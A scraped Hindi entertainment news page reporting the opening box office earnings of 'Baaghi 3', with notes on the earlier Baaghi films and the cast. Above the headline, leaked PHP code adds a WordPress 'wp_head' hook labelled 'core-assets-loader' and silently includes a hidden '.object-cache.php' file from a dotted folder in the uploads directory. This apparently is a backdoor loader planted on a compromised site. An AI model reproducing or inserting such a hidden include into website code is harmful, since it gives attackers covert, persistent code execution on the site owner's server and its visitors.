add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); टाइगर श्रॉफ की ‘Baaghi 3’ ने की बॉक्स ऑफिस पर शानदार शुरुआत, कमाए इतने करोड़ – SOCH INDIA
Menu

देश
टाइगर श्रॉफ की ‘Baaghi 3’ ने की बॉक्स ऑफिस पर शानदार शुरुआत, कमाए इतने करोड़

nobanner

बॉलीवुड के एक्शन स्टार टाइगर श्रॉफ (Tiger Shroff), रितेश देशमुख (Riteish Deshmukh) और श्रद्धा कपूर (Shraddha Kapoor) की फिल्म ‘बागी 3 (Baaghi 3)’ शुक्रवार को रिलीज हो चुकी है. जबरदस्त एक्शन और जांबाजी वाले स्टंट से सराबोर यह फिल्म बॉक्स ऑफिस पर अपनी जबरदस्त शुरुआत कर चुकी है. फिल्म ने बेहतरीन तरीके से अपना खाता खोला है.

फिल्म यह ‘बागी’ फ्रेंचाइजी की तीसरी फिल्म है. जिसके पहले दिन कलेक्शन के आंकड़े बता रहे हैं कि इसे लेकर फैन्स में काफी एक्साइटमेंट थी. हालांकि क्रिटक्स ने फिल्म को बहुत ज्यादा परफेक्ट करार नहीं दिया लेकिन तब भी टाइगर की फिल्म ने पहले दिन सिनेमाघरों में ताबड़तोड़ कमाई की है. बॉक्स ऑफिस इंडिया डॉट कॉम वेबसाइट के अनुसार इस फिल्म ने पहले दिन 17 से 18 करोड़ रुपये की कमाई के साथ ओपनिंग की.

बता दें कि इस फ्रैंचाइजी की पहली फिल्म ‘बागी’ साल 2016 में आई थी. इस फिल्म में भी टाइगर और श्रद्धा लीड रोल में थे. बागी की दोनों ही सीरीज एक्शन से भरपूर थी. इसलिए बागी की तीसरी सीरीज से दर्शकों की उम्मीदें भी तीन गुना ज्यादा थीं. ‘बागी 2’ ने लगभग 200 करोड़ की बंपर कमाई की थी. वहीं, ‘बागी’ ने 150 करोड़ की कमाई करके बॉक्स ऑफिस पर अपना जादू कायम किया था. यही वजह है कि ‘बागी 3’ से भी दर्शकों को काफी उम्मीदें हैं.

‘बागी 3’ में टाइगर श्रॉफ, श्रद्धा कपूर, रितेश देशमुख मुख्य भूमिका में नजर आ रहे हैं. वहीं इनके अलावा फिल्म के ट्रेलर में अंकिता लोखंडे, विजय वर्मा, जयदीप अहलावत, जमीर खोरी और दानिश भट्ट ने भी अहम भूमिकाएं निभाई हैं.